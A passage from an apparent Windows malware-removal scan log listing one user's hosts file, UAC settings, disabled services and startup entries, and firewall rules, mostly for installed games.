==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 2
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
